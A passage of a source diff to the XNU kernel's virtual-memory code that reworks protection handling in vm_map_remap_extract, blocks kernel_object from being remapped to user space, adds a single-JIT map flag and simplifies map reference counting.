         *      Create an object if necessary.
         */
@@ -14065,6 +13929,7 @@ vm_map_region_recurse_64(
        vm_region_submap_short_info_64_t short_info;
        boolean_t                       do_region_footprint;
        int                             effective_page_size, effective_page_shift;
+       boolean_t                       submap_needed_copy;
 
        if (map == VM_MAP_NULL) {
                /* no address space to work on */
@@ -14105,6 +13970,7 @@ vm_map_region_recurse_64(
 
        user_address = *address;
        user_max_depth = *nesting_depth;
+       submap_needed_copy = FALSE;
 
        if (not_in_kdp) {
                vm_map_lock_read(map);
@@ -14241,6 +14107,11 @@ recurse_again:
                 * Get down to the next submap level.
                 */
 
+               if (curr_entry->needs_copy) {
+                       /* everything below this is effectively copy-on-write */
+                       submap_needed_copy = TRUE;
+               }
+
                /*
                 * Lock the next level and unlock the current level,
                 * unless we need to keep it locked to access the "next_entry"
@@ -14318,6 +14189,9 @@ recurse_again:
                                submap_info->shadow_depth = 0;
                                submap_info->external_pager = 0;
                                submap_info->share_mode = SM_PRIVATE;
+                               if (submap_needed_copy) {
+                                       submap_info->share_mode = SM_COW;
+                               }
                                submap_info->is_submap = 0;
                                submap_info->behavior = VM_BEHAVIOR_DEFAULT;
                                submap_info->object_id = VM_OBJECT_ID_FAKE(map, task_ledgers.purgeable_nonvolatile);
@@ -14336,6 +14210,9 @@ recurse_again:
                                short_info->external_pager = 0;
                                short_info->shadow_depth = 0;
                                short_info->share_mode = SM_PRIVATE;
+                               if (submap_needed_copy) {
+                                       short_info->share_mode = SM_COW;
+                               }
                                short_info->ref_count = 1;
                        }
                        *nesting_depth = 0;
@@ -14444,6 +14321,9 @@ recurse_again:
                            extended.share_mode == SM_SHARED) {
                                extended.share_mode = SM_PRIVATE;
                        }
+                       if (submap_needed_copy) {
+                               extended.share_mode = SM_COW;
+                       }
                } else {
                        if (curr_entry->use_pmap) {
                                extended.share_mode = SM_TRUESHARED;
@@ -15160,8 +15040,6 @@ vm_map_simplify_entry(
 {
        vm_map_entry_t  prev_entry;
 
-       counter(c_vm_map_simplify_entry_called++);
-
        prev_entry = this_entry->vme_prev;
 
        if ((this_entry != vm_map_to_entry(map)) &&
@@ -15228,7 +15106,6 @@ vm_map_simplify_entry(
                }
                vm_map_entry_dispose(map, prev_entry);
                SAVE_HINT_MAP_WRITE(map, this_entry);
-               counter(c_vm_map_simplified++);
        }
 }
 
@@ -15244,7 +15121,6 @@ vm_map_simplify(
                vm_map_simplify_entry(map, this_entry);
                vm_map_simplify_entry(map, this_entry->vme_next);
        }
-       counter(c_vm_map_simplify_called++);
        vm_map_unlock(map);
 }
 
@@ -15807,8 +15683,6 @@ vm_map_entry_is_reusable(
                object->shadow == VM_OBJECT_NULL &&
                object->internal &&
                object->purgable == VM_PURGABLE_DENY &&
-               object->copy_strategy != MEMORY_OBJECT_COPY_DELAY &&
-               !object->true_share &&
                object->wimg_bits == VM_WIMG_USE_DEFAULT &&
                !object->code_signed) {
                return TRUE;
@@ -16332,8 +16206,6 @@ vm_map_entry_insert(
        return new_entry;
 }
 
-int vm_remap_old_path = 0;
-int vm_remap_new_path = 0;
 /*
  *     Routine:        vm_map_remap_extract
  *
@@ -16344,11 +16216,10 @@ vm_map_remap_extract(
        vm_map_t                map,
        vm_map_offset_t         addr,
        vm_map_size_t           size,
-       vm_prot_t               required_protection,
        boolean_t               copy,
        struct vm_map_header    *map_header,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,   /* IN/OUT */
+       vm_prot_t               *max_protection,   /* IN/OUT */
        /* What, no behavior? */
        vm_inherit_t            inheritance,
        vm_map_kernel_flags_t   vmk_flags)
@@ -16371,6 +16242,8 @@ vm_map_remap_extract(
        vm_prot_t               max_prot_for_prot_copy;
        vm_map_offset_t         effective_page_mask;
        boolean_t               pageable, same_map;
+       boolean_t               vm_remap_legacy;
+       vm_prot_t               required_cur_prot, required_max_prot;
 
        pageable = vmk_flags.vmkf_copy_pageable;
        same_map = vmk_flags.vmkf_copy_same_map;
@@ -16383,7 +16256,9 @@ vm_map_remap_extract(
        assert(inheritance == VM_INHERIT_NONE ||
            inheritance == VM_INHERIT_COPY ||
            inheritance == VM_INHERIT_SHARE);
-       assert(!(required_protection & ~VM_PROT_ALL));
+       assert(!(*cur_protection & ~VM_PROT_ALL));
+       assert(!(*max_protection & ~VM_PROT_ALL));
+       assert((*cur_protection & *max_protection) == *cur_protection);
 
        /*
         *      Compute start and end of region.
@@ -16405,12 +16280,52 @@ vm_map_remap_extract(
        vm_map_store_init( map_header );
 
        if (copy && vmk_flags.vmkf_remap_prot_copy) {
+               /*
+                * Special case for vm_map_protect(VM_PROT_COPY):
+                * we want to set the new mappings' max protection to the
+                * specified *max_protection...
+                */
                max_prot_for_prot_copy = *max_protection & VM_PROT_ALL;
+               /* ... but we want to use the vm_remap() legacy mode */
+               *max_protection = VM_PROT_NONE;
+               *cur_protection = VM_PROT_NONE;
        } else {
                max_prot_for_prot_copy = VM_PROT_NONE;
        }
-       *cur_protection = VM_PROT_ALL;
-       *max_protection = VM_PROT_ALL;
+
+       if (*cur_protection == VM_PROT_NONE &&
+           *max_protection == VM_PROT_NONE) {
+               /*
+                * vm_remap() legacy mode:
+                * Extract all memory regions in the specified range and
+                * collect the strictest set of protections allowed on the
+                * entire range, so the caller knows what they can do with
+                * the remapped range.
+                * We start with VM_PROT_ALL and we'll remove the protections
+                * missing from each memory region.
+                */
+               vm_remap_legacy = TRUE;
+               *cur_protection = VM_PROT_ALL;
+               *max_protection = VM_PROT_ALL;
+               required_cur_prot = VM_PROT_NONE;
+               required_max_prot = VM_PROT_NONE;
+       } else {
+               /*
+                * vm_remap_new() mode:
+                * Extract all memory regions in the specified range and
+                * ensure that they have at least the protections specified
+                * by the caller via *cur_protection and *max_protection.
+                * The resulting mapping should have these protections.
+                */
+               vm_remap_legacy = FALSE;
+               if (copy) {
+                       required_cur_prot = VM_PROT_NONE;
+                       required_max_prot = VM_PROT_READ;
+               } else {
+                       required_cur_prot = *cur_protection;
+                       required_max_prot = *max_protection;
+               }
+       }
 
        map_address = 0;
        mapped_size = 0;
@@ -16460,9 +16375,10 @@ vm_map_remap_extract(
                        vm_map_t submap;
                        vm_map_offset_t submap_start;
                        vm_map_size_t submap_size;
+                       boolean_t submap_needs_copy;
 
                        /*
-                        * No check for "required_protection" on "src_entry"
+                        * No check for "required protection" on "src_entry"
                         * because the protections that matter are the ones
                         * on the submap's VM map entry, which will be checked
                         * during the call to vm_map_remap_extract() below.
@@ -16473,14 +16389,57 @@ vm_map_remap_extract(
                        }
                        submap_start = VME_OFFSET(src_entry) + src_start - src_entry->vme_start;
                        submap = VME_SUBMAP(src_entry);
+                       if (copy) {
+                               /*
+                                * The caller wants a copy-on-write re-mapping,
+                                * so let's extract from the submap accordingly.
+                                */
+                               submap_needs_copy = TRUE;
+                       } else if (src_entry->needs_copy) {
+                               /*
+                                * The caller wants a shared re-mapping but the
+                                * submap is mapped with "needs_copy", so its
+                                * contents can't be shared as is. Extract the
+                                * contents of the submap as "copy-on-write".
+                                * The re-mapping won't be shared with the
+                                * original mapping but this is equivalent to
+                                * what happened with the original "remap from
+                                * submap" code.
+                                * The shared region is mapped "needs_copy", for
+                                * example.
+                                */
+                               submap_needs_copy = TRUE;
+                       } else {
+                               /*
+                                * The caller wants a shared re-mapping and
+                                * this mapping can be shared (no "needs_copy"),
+                                * so let's extract from the submap accordingly.
+                                * Kernel submaps are mapped without
+                                * "needs_copy", for example.
+                                */
+                               submap_needs_copy = FALSE;
+                       }
                        vm_map_reference(submap);
                        vm_map_unlock(map);
                        src_entry = NULL;
+                       if (vm_remap_legacy) {
+                               *cur_protection = VM_PROT_NONE;
+                               *max_protection = VM_PROT_NONE;
+                       }
+
+                       DTRACE_VM7(remap_submap_recurse,
+                           vm_map_t, map,
+                           vm_map_offset_t, addr,
+                           vm_map_size_t, size,
+                           boolean_t, copy,
+                           vm_map_offset_t, submap_start,
+                           vm_map_size_t, submap_size,
+                           boolean_t, submap_needs_copy);
+
                        result = vm_map_remap_extract(submap,
                            submap_start,
                            submap_size,
-                           required_protection,
-                           copy,
+                           submap_needs_copy,
                            map_header,
                            cur_protection,
                            max_protection,
@@ -16490,8 +16449,12 @@ vm_map_remap_extract(
                        return result;
                }
 
-               if ((src_entry->protection & required_protection)
-                   != required_protection) {
+               if (src_entry->is_sub_map) {
+                       /* protections for submap mapping are irrelevant here */
+               } else if (((src_entry->protection & required_cur_prot) !=
+                   required_cur_prot) ||
+                   ((src_entry->max_protection & required_max_prot) !=
+                   required_max_prot)) {
                        if (vmk_flags.vmkf_copy_single_object &&
                            mapped_size != 0) {
                                /*
@@ -16514,18 +16477,16 @@ vm_map_remap_extract(
                        break;
                }
 
-               if (src_entry->is_sub_map &&
-                   VM_MAP_PAGE_SHIFT(VME_SUBMAP(src_entry)) < PAGE_SHIFT) {
+               if (src_entry->is_sub_map) {
                        vm_map_t submap;
                        vm_map_offset_t submap_start;
                        vm_map_size_t submap_size;
                        vm_map_copy_t submap_copy;
                        vm_prot_t submap_curprot, submap_maxprot;
-
-                       vm_remap_new_path++;
+                       boolean_t submap_needs_copy;
 
                        /*
-                        * No check for "required_protection" on "src_entry"
+                        * No check for "required protection" on "src_entry"
                         * because the protections that matter are the ones
                         * on the submap's VM map entry, which will be checked
                         * during the call to vm_map_copy_extract() below.
@@ -16537,16 +16498,47 @@ vm_map_remap_extract(
                        submap = VME_SUBMAP(src_entry);
                        submap_start = VME_OFFSET(src_entry) + src_start - src_entry->vme_start;
                        submap_size = tmp_size;
+                       if (copy) {
+                               /*
+                                * The caller wants a copy-on-write re-mapping,
+                                * so let's extract from the submap accordingly.
+                                */
+                               submap_needs_copy = TRUE;
+                       } else if (src_entry->needs_copy) {
+                               /*
+                                * The caller wants a shared re-mapping but the
+                                * submap is mapped with "needs_copy", so its
+                                * contents can't be shared as is. Extract the
+                                * contents of the submap as "copy-on-write".
+                                * The re-mapping won't be shared with the
+                                * original mapping but this is equivalent to
+                                * what happened with the original "remap from
+                                * submap" code.
+                                * The shared region is mapped "needs_copy", for
+                                * example.
+                                */
+                               submap_needs_copy = TRUE;
+                       } else {
+                               /*
+                                * The caller wants a shared re-mapping and
+                                * this mapping can be shared (no "needs_copy"),
+                                * so let's extract from the submap accordingly.
+                                * Kernel submaps are mapped without
+                                * "needs_copy", for example.
+                                */
+                               submap_needs_copy = FALSE;
+                       }
                        /* extra ref to keep submap alive */
                        vm_map_reference(submap);
 
-                       DTRACE_VM6(remap_submap_recurse,
+                       DTRACE_VM7(remap_submap_recurse,
                            vm_map_t, map,
                            vm_map_offset_t, addr,
                            vm_map_size_t, size,
                            boolean_t, copy,
                            vm_map_offset_t, submap_start,
-                           vm_map_size_t, submap_size);
+                           vm_map_size_t, submap_size,
+                           boolean_t, submap_needs_copy);
 
                        /*
                         * The map can be safely unlocked since we
@@ -16560,11 +16552,21 @@ vm_map_remap_extract(
                        vm_map_unlock(map);
                        src_entry = NULL; /* not valid once map is unlocked */
 
+                       if (vm_remap_legacy) {
+                               submap_curprot = VM_PROT_NONE;
+                               submap_maxprot = VM_PROT_NONE;
+                               if (max_prot_for_prot_copy) {
+                                       submap_maxprot = max_prot_for_prot_copy;
+                               }
+                       } else {
+                               assert(!max_prot_for_prot_copy);
+                               submap_curprot = *cur_protection;
+                               submap_maxprot = *max_protection;
+                       }
                        result = vm_map_copy_extract(submap,
                            submap_start,
                            submap_size,
-                           required_protection,
-                           copy,
+                           submap_needs_copy,
                            &submap_copy,
                            &submap_curprot,
                            &submap_maxprot,
@@ -16588,6 +16590,26 @@ vm_map_remap_extract(
 
                                copy_entry = vm_map_copy_first_entry(submap_copy);
                                assert(!copy_entry->is_sub_map);
+                               object = VME_OBJECT(copy_entry);
+
+                               /*
+                                * Prevent kernel_object from being exposed to
+                                * user space.
+                                */
+                               if (__improbable(object == kernel_object)) {
+                                       printf("%d[%s]: rejecting attempt to extract from kernel_object\n",
+                                           proc_selfpid(),
+                                           (current_task()->bsd_info
+                                           ? proc_name_address(current_task()->bsd_info)
+                                           : "?"));
+                                       DTRACE_VM(extract_kernel_only);
+                                       result = KERN_INVALID_RIGHT;
+                                       vm_map_copy_discard(submap_copy);
+                                       submap_copy = VM_MAP_COPY_NULL;
+                                       vm_map_lock(map);
+                                       break;
+                               }
+
                                vm_map_copy_entry_unlink(submap_copy, copy_entry);
                                copy_entry_size = copy_entry->vme_end - copy_entry->vme_start;
                                copy_entry->vme_start = map_address;
@@ -16603,24 +16625,32 @@ vm_map_remap_extract(
                        /* done with submap_copy */
                        vm_map_copy_discard(submap_copy);
 
-                       *cur_protection &= submap_curprot;
-                       *max_protection &= submap_maxprot;
+                       if (vm_remap_legacy) {
+                               *cur_protection &= submap_curprot;
+                               *max_protection &= submap_maxprot;
+                       }
 
                        /* re-acquire the map lock and continue to next entry */
                        vm_map_lock(map);
                        continue;
-               } else if (src_entry->is_sub_map) {
-                       vm_remap_old_path++;
-                       DTRACE_VM4(remap_submap,
-                           vm_map_t, map,
-                           vm_map_offset_t, addr,
-                           vm_map_size_t, size,
-                           boolean_t, copy);
-
-                       vm_map_reference(VME_SUBMAP(src_entry));
-                       object = VM_OBJECT_NULL;
                } else {
                        object = VME_OBJECT(src_entry);
+
+                       /*
+                        * Prevent kernel_object from being exposed to
+                        * user space.
+                        */
+                       if (__improbable(object == kernel_object)) {
+                               printf("%d[%s]: rejecting attempt to extract from kernel_object\n",
+                                   proc_selfpid(),
+                                   (current_task()->bsd_info
+                                   ? proc_name_address(current_task()->bsd_info)
+                                   : "?"));
+                               DTRACE_VM(extract_kernel_only);
+                               result = KERN_INVALID_RIGHT;
+                               break;
+                       }
+
                        if (src_entry->iokit_acct) {
                                /*
                                 * This entry uses "IOKit accounting".
@@ -16663,6 +16693,7 @@ vm_map_remap_extract(
                                VME_OFFSET_SET(src_entry, 0);
                                VME_OBJECT_SET(src_entry, object);
                                assert(src_entry->use_pmap);
+                               assert(!map->mapped_in_other_pmaps);
                        } else if (src_entry->wired_count ||
                            object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) {
                                /*
@@ -16756,6 +16787,7 @@ vm_map_remap_extract(
                                 */
                                object->copy_strategy =
                                    MEMORY_OBJECT_COPY_DELAY;
+                               object->true_share = TRUE;
                        }
                        vm_object_unlock(object);
                }
@@ -16801,6 +16833,10 @@ vm_map_remap_extract(
                        new_entry->max_protection |= VM_PROT_WRITE;
                } else {
                        new_entry->inheritance = inheritance;
+                       if (!vm_remap_legacy) {
+                               new_entry->protection = *cur_protection;
+                               new_entry->max_protection = *max_protection;
+                       }
                }
                VME_OFFSET_SET(new_entry, offset);
 
@@ -16978,8 +17014,8 @@ RestartCopy:
                _vm_map_store_entry_link(map_header,
                    map_header->links.prev, new_entry);
 
-               /*Protections for submap mapping are irrelevant here*/
-               if (!src_entry->is_sub_map) {
+               /* protections for submap mapping are irrelevant here */
+               if (vm_remap_legacy && !src_entry->is_sub_map) {
                        *cur_protection &= src_entry->protection;
                        *max_protection &= src_entry->max_protection;
                }
@@ -17045,6 +17081,15 @@ vm_map_mark_alien(
        map->is_alien = true;
        vm_map_unlock(map);
 }
+
+void
+vm_map_single_jit(
+       vm_map_t map)
+{
+       vm_map_lock(map);
+       map->single_jit = true;
+       vm_map_unlock(map);
+}
 #endif /* XNU_TARGET_OS_OSX */
 
 void vm_map_copy_to_physcopy(vm_map_copy_t copy_map, vm_map_t target_map);
@@ -17622,8 +17667,9 @@ vm_map_range_physical_size(
        vmk_flags.vmkf_copy_pageable = TRUE;
        vmk_flags.vmkf_copy_same_map = TRUE;
        assert(adjusted_size != 0);
+       cur_prot = VM_PROT_NONE; /* legacy mode */
+       max_prot = VM_PROT_NONE; /* legacy mode */
        kr = vm_map_copy_extract(map, adjusted_start, adjusted_size,
-           VM_PROT_NONE, /* required_protection: no check here */
            FALSE /* copy */,
            &copy_map,
            &cur_prot, &max_prot, VM_INHERIT_DEFAULT,
@@ -17679,7 +17725,7 @@ memory_entry_check_for_adjustment(
 
        vm_named_entry_t        named_entry;
 
-       named_entry = (vm_named_entry_t) port->ip_kobject;
+       named_entry = (vm_named_entry_t) ipc_kobject_get(port);
        named_entry_lock(named_entry);
        copy_map = named_entry->backing.copy;
        target_copy_map = copy_map;
@@ -17730,8 +17776,8 @@ vm_map_remap(
        vm_map_t                src_map,
        vm_map_offset_t         memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection, /* IN/OUT */
+       vm_prot_t               *max_protection, /* IN/OUT */
        vm_inherit_t            inheritance)
 {
        kern_return_t           result;
@@ -17841,10 +17887,9 @@ vm_map_remap(
        result = vm_map_copy_extract(src_map,
            memory_address,
            size,
-           VM_PROT_NONE, /* required_protection: no check here */
            copy, &copy_map,
-           cur_protection,
-           max_protection,
+           cur_protection, /* IN/OUT */
+           max_protection, /* IN/OUT */
            inheritance,
            vmk_flags);
        if (result != KERN_SUCCESS) {
@@ -19641,7 +19686,7 @@ convert_port_entry_to_map(
                                        mach_destroy_memory_entry(port);
                                        return VM_MAP_NULL;
                                }
-                               vm_map_reference_swap(map);
+                               vm_map_reference(map);
                                mach_destroy_memory_entry(port);
                                break;
                        } else {
@@ -19726,27 +19771,16 @@ current_map(void)
 /*
  *     vm_map_reference:
  *
- *     Most code internal to the osfmk will go through a
- *     macro defining this.  This is always here for the
- *     use of other kernel components.
+ *     Takes a reference on the specified map.
  */
-#undef vm_map_reference
 void
 vm_map_reference(
        vm_map_t        map)
 {
-       if (map == VM_MAP_NULL) {
-               return;
+       if (__probable(map != VM_MAP_NULL)) {
+               vm_map_require(map);
+               os_ref_retain(&map->map_refcnt);
        }
-
-       lck_mtx_lock(&map->s_lock);
-#if     TASK_SWAPPER
-       assert(map->res_count > 0);
-       assert(os_ref_get_count(&map->map_refcnt) >= map->res_count);
-       map->res_count++;
-#endif
-       os_ref_retain_locked(&map->map_refcnt);
-       lck_mtx_unlock(&map->s_lock);
 }
 
 /*
@@ -19760,32 +19794,12 @@ void
 vm_map_deallocate(
        vm_map_t        map)
 {
-       unsigned int            ref;
-
-       if (map == VM_MAP_NULL) {
-               return;
-       }
-
-       lck_mtx_lock(&map->s_lock);
-       ref = os_ref_release_locked(&map->map_refcnt);
-       if (ref > 0) {
-               vm_map_res_deallocate(map);
-               lck_mtx_unlock(&map->s_lock);
-               return;
+       if (__probable(map != VM_MAP_NULL)) {
+               vm_map_require(map);
+               if (os_ref_release(&map->map_refcnt) == 0) {
+                       vm_map_destroy(map, VM_MAP_REMOVE_NO_FLAGS);
+               }
        }
-       assert(os_ref_get_count(&map->map_refcnt) == 0);
-       lck_mtx_unlock(&map->s_lock);
-
-#if     TASK_SWAPPER
-       /*
-        * The map residence count isn't decremented here because
-        * the vm_map_delete below will traverse the entire map,
-        * deleting entries, and the residence counts on objects
-        * and sharing maps will go away then.
-        */
-#endif
-
-       vm_map_destroy(map, VM_MAP_REMOVE_NO_FLAGS);
 }
 
 void
index cd1364f2b1b97fc160aab6166e937f74efc834e8..dca074ab68550129587231a4b9a9a8f988624c19 100644 (file)
@@ -109,7 +109,6 @@ __END_DECLS
 
 #ifdef  MACH_KERNEL_PRIVATE
 
-#include <task_swapper.h>
 #include <mach_assert.h>
 
 #include <vm/vm_object.h>
@@ -467,9 +466,9 @@ struct _vm_map {
        vm_map_size_t           size;           /* virtual size */
        vm_map_size_t           user_wire_limit;/* rlimit on user locked memory */
        vm_map_size_t           user_wire_size; /* current size of user locked memory in this map */
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        vm_map_offset_t         vmmap_high_start;
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
        union {
                /*
@@ -504,31 +503,27 @@ struct _vm_map {
 #define first_free              f_s._first_free
 #define holes_list              f_s._holes
 
-       struct os_refcnt        map_refcnt;     /* Reference count */
-
-#if     TASK_SWAPPER
-       int                     res_count;      /* Residence count (swap) */
-       int                     sw_state;       /* Swap state */
-#endif  /* TASK_SWAPPER */
+       struct os_refcnt        map_refcnt;       /* Reference count */
 
        unsigned int
        /* boolean_t */ wait_for_space:1,         /* Should callers wait for space? */
-       /* boolean_t */ wiring_required:1,         /* All memory wired? */
-       /* boolean_t */ no_zero_fill:1,         /*No zero fill absent pages */
-       /* boolean_t */ mapped_in_other_pmaps:1,         /*has this submap been mapped in maps that use a different pmap */
-       /* boolean_t */ switch_protect:1,         /*  Protect map from write faults while switched */
-       /* boolean_t */ disable_vmentry_reuse:1,         /*  All vm entries should keep using newer and higher addresses in the map */
-       /* boolean_t */ map_disallow_data_exec:1,         /* Disallow execution from data pages on exec-permissive architectures */
+       /* boolean_t */ wiring_required:1,        /* All memory wired? */
+       /* boolean_t */ no_zero_fill:1,           /* No zero fill absent pages */
+       /* boolean_t */ mapped_in_other_pmaps:1,  /* has this submap been mapped in maps that use a different pmap */
+       /* boolean_t */ switch_protect:1,         /* Protect map from write faults while switched */
+       /* boolean_t */ disable_vmentry_reuse:1,  /* All vm entries should keep using newer and higher addresses in the map */
+       /* boolean_t */ map_disallow_data_exec:1, /* Disallow execution from data pages on exec-permissive architectures */
        /* boolean_t */ holelistenabled:1,
        /* boolean_t */ is_nested_map:1,
-       /* boolean_t */ map_disallow_new_exec:1,         /* Disallow new executable code */
+       /* boolean_t */ map_disallow_new_exec:1, /* Disallow new executable code */
        /* boolean_t */ jit_entry_exists:1,
        /* boolean_t */ has_corpse_footprint:1,
        /* boolean_t */ terminated:1,
-       /* boolean_t */ is_alien:1,             /* for platform simulation, i.e. PLATFORM_IOS on OSX */
-       /* boolean_t */ cs_enforcement:1,       /* code-signing enforcement */
-       /* boolean_t */ reserved_regions:1,       /* has reserved regions. The map size that userspace sees should ignore these. */
-       /* reserved */ pad:16;
+       /* boolean_t */ is_alien:1,              /* for platform simulation, i.e. PLATFORM_IOS on OSX */
+       /* boolean_t */ cs_enforcement:1,        /* code-signing enforcement */
+       /* boolean_t */ reserved_regions:1,      /* has reserved regions. The map size that userspace sees should ignore these. */
+       /* boolean_t */ single_jit:1,        /* only allow one JIT mapping */
+       /* reserved */ pad:15;
        unsigned int            timestamp;      /* Version number */
 };
 
@@ -537,14 +532,6 @@ struct _vm_map {
 #define vm_map_first_entry(map) ((map)->hdr.links.next)
 #define vm_map_last_entry(map)  ((map)->hdr.links.prev)
 
-#if     TASK_SWAPPER
-/*
- * VM map swap states.  There are no transition states.
- */
-#define MAP_SW_IN        1      /* map is swapped in; residence count > 0 */
-#define MAP_SW_OUT       2      /* map is out (res_count == 0 */
-#endif  /* TASK_SWAPPER */
-
 /*
  *     Type:           vm_map_version_t [exported; contents invisible]
  *
@@ -828,97 +815,9 @@ extern vm_map_entry_t   vm_map_entry_insert(
 /* Physical map associated
 * with this address map */
 
-/*
- * Macros/functions for map residence counts and swapin/out of vm maps
- */
-#if     TASK_SWAPPER
-
-#if     MACH_ASSERT
 /* Gain a reference to an existing map */
 extern void             vm_map_reference(
        vm_map_t        map);
-/* Lose a residence count */
-extern void             vm_map_res_deallocate(
-       vm_map_t        map);
-/* Gain a residence count on a map */
-extern void             vm_map_res_reference(
-       vm_map_t        map);
-/* Gain reference & residence counts to possibly swapped-out map */
-extern void             vm_map_reference_swap(
-       vm_map_t        map);
-
-#else   /* MACH_ASSERT */
-
-#define vm_map_reference(map)           \
-MACRO_BEGIN                                      \
-       vm_map_t Map = (map);                    \
-       if (Map) {                               \
-               lck_mtx_lock(&Map->s_lock);      \
-               Map->res_count++;                \
-               os_ref_retain(&Map->map_refcnt); \
-               lck_mtx_unlock(&Map->s_lock);    \
-       }                                        \
-MACRO_END
-
-#define vm_map_res_reference(map)               \
-MACRO_BEGIN                                     \
-       vm_map_t Lmap = (map);          \
-       if (Lmap->res_count == 0) {             \
-               lck_mtx_unlock(&Lmap->s_lock);\
-               vm_map_lock(Lmap);              \
-               vm_map_swapin(Lmap);            \
-               lck_mtx_lock(&Lmap->s_lock);    \
-               ++Lmap->res_count;              \
-               vm_map_unlock(Lmap);            \
-       } else                                  \
-               ++Lmap->res_count;              \
-MACRO_END
-
-#define vm_map_res_deallocate(map)              \
-MACRO_BEGIN                                     \
-       vm_map_t Map = (map);           \
-       if (--Map->res_count == 0) {    \
-               lck_mtx_unlock(&Map->s_lock);   \
-               vm_map_lock(Map);               \
-               vm_map_swapout(Map);            \
-               vm_map_unlock(Map);             \
-               lck_mtx_lock(&Map->s_lock);     \
-       }                                       \
-MACRO_END
-
-#define vm_map_reference_swap(map)      \
-MACRO_BEGIN                             \
-       vm_map_t Map = (map);           \
-       lck_mtx_lock(&Map->s_lock);     \
-       os_ref_retain(&Map->map_refcnt);\
-       vm_map_res_reference(Map);      \
-       lck_mtx_unlock(&Map->s_lock);   \
-MACRO_END
-#endif  /* MACH_ASSERT */
-
-extern void             vm_map_swapin(
-       vm_map_t        map);
-
-extern void             vm_map_swapout(
-       vm_map_t        map);
-
-#else   /* TASK_SWAPPER */
-
-#define vm_map_reference(map)                   \
-MACRO_BEGIN                                     \
-       vm_map_t Map = (map);                   \
-       if (Map) {                              \
-               lck_mtx_lock(&Map->s_lock);     \
-               os_ref_retain(&Map->map_refcnt);\
-               lck_mtx_unlock(&Map->s_lock);   \
-       }                                       \
-MACRO_END
-
-#define vm_map_reference_swap(map)      vm_map_reference(map)
-#define vm_map_res_reference(map)
-#define vm_map_res_deallocate(map)
-
-#endif  /* TASK_SWAPPER */
 
 /*
  *     Submap object.  Must be used to create memory to be put
@@ -939,28 +838,6 @@ extern vm_object_t      vm_submap_object;
        thread_wakeup((event_t)(&(map)->hdr))
 
 
-#define vm_map_ref_fast(map)                    \
-       MACRO_BEGIN                                     \
-       lck_mtx_lock(&map->s_lock);                     \
-       map->ref_count++;                               \
-       vm_map_res_reference(map);                      \
-       lck_mtx_unlock(&map->s_lock);                   \
-       MACRO_END
-
-#define vm_map_dealloc_fast(map)                \
-       MACRO_BEGIN                                     \
-       int c;                                          \
-                                                        \
-       lck_mtx_lock(&map->s_lock);                     \
-       c = --map->ref_count;                   \
-       if (c > 0)                                      \
-               vm_map_res_deallocate(map);             \
-       lck_mtx_unlock(&map->s_lock);                   \
-       if (c == 0)                                     \
-               vm_map_destroy(map);                    \
-       MACRO_END
-
-
 /* simplify map entries */
 extern void             vm_map_simplify_entry(
        vm_map_t        map,
@@ -1384,6 +1261,9 @@ extern kern_return_t    vm_map_enter_mem_object_control(
 extern kern_return_t    vm_map_terminate(
        vm_map_t                map);
 
+extern void             vm_map_require(
+       vm_map_t                map);
+
 #endif /* !XNU_KERNEL_PRIVATE */
 
 /* Deallocate a region */
@@ -1475,7 +1355,6 @@ extern kern_return_t    vm_map_copy_extract(
        vm_map_t                src_map,
        vm_map_address_t        src_addr,
        vm_map_size_t           len,
-       vm_prot_t               required_prot,
        boolean_t               copy,
        vm_map_copy_t           *copy_result,   /* OUT */
        vm_prot_t               *cur_prot,      /* OUT */
@@ -1529,11 +1408,11 @@ extern kern_return_t    vm_map_raise_max_offset(
 extern kern_return_t    vm_map_raise_min_offset(
        vm_map_t        map,
        vm_map_offset_t new_min_offset);
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 extern void vm_map_set_high_start(
        vm_map_t        map,
        vm_map_offset_t high_start);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 extern vm_map_offset_t  vm_compute_max_offset(
        boolean_t               is64);
@@ -1607,6 +1486,7 @@ mach_vm_range_overflows(mach_vm_offset_t addr, mach_vm_size_t size)
 
 #if XNU_TARGET_OS_OSX
 extern void vm_map_mark_alien(vm_map_t map);
+extern void vm_map_single_jit(vm_map_t map);
 #endif /* XNU_TARGET_OS_OSX */
 
 extern kern_return_t vm_map_page_info(
@@ -1716,7 +1596,7 @@ static inline bool
 VM_MAP_POLICY_ALLOW_MULTIPLE_JIT(
        vm_map_t map __unused)
 {
-       if (VM_MAP_IS_ALIEN(map)) {
+       if (VM_MAP_IS_ALIEN(map) || map->single_jit) {
                return false;
        }
        return true;
index b7a718aea16d8e709529455e430453ba88cf43fd..178a195525ad1acf31aab41c123cffe836756985 100644 (file)
@@ -64,7 +64,6 @@
 
 #include <debug.h>
 #include <mach_pagemap.h>
-#include <task_swapper.h>
 
 #include <mach/mach_types.h>
 #include <mach/memory_object.h>
@@ -244,10 +243,18 @@ SECURITY_READ_ONLY_LATE(zone_t) vm_object_zone; /* vm backing store zone */
  *     memory object (kernel_object) to avoid wasting data structures.
  */
 static struct vm_object                 kernel_object_store VM_PAGE_PACKED_ALIGNED;
-vm_object_t                             kernel_object;
+SECURITY_READ_ONLY_LATE(vm_object_t)    kernel_object = &kernel_object_store;
 
 static struct vm_object                 compressor_object_store VM_PAGE_PACKED_ALIGNED;
-vm_object_t                             compressor_object = &compressor_object_store;
+SECURITY_READ_ONLY_LATE(vm_object_t)    compressor_object = &compressor_object_store;
+
+/*
+ * This object holds all pages that have been retired due to errors like ECC.
+ * The system should never use the page or look at its contents. The offset
+ * in this object is the same as the page's physical address.
+ */
+static struct vm_object                 retired_pages_object_store VM_PAGE_PACKED_ALIGNED;
+SECURITY_READ_ONLY_LATE(vm_object_t)    retired_pages_object = &retired_pages_object_store;
 
 /*
  *     The submap object is used as a placeholder for vm_map_submap
@@ -256,6 +263,8 @@ vm_object_t                             compressor_object = &compressor_object_s
  *     here because it must be initialized here.
  */
 static struct vm_object                 vm_submap_object_store VM_PAGE_PACKED_ALIGNED;
+SECURITY_READ_ONLY_LATE(vm_object_t)    vm_submap_object = &vm_submap_object_store;
+
 
 /*
  *     Virtual memory objects are initialized from
@@ -279,9 +288,6 @@ static const struct vm_object vm_object_template = {
        .vo_size = 0,
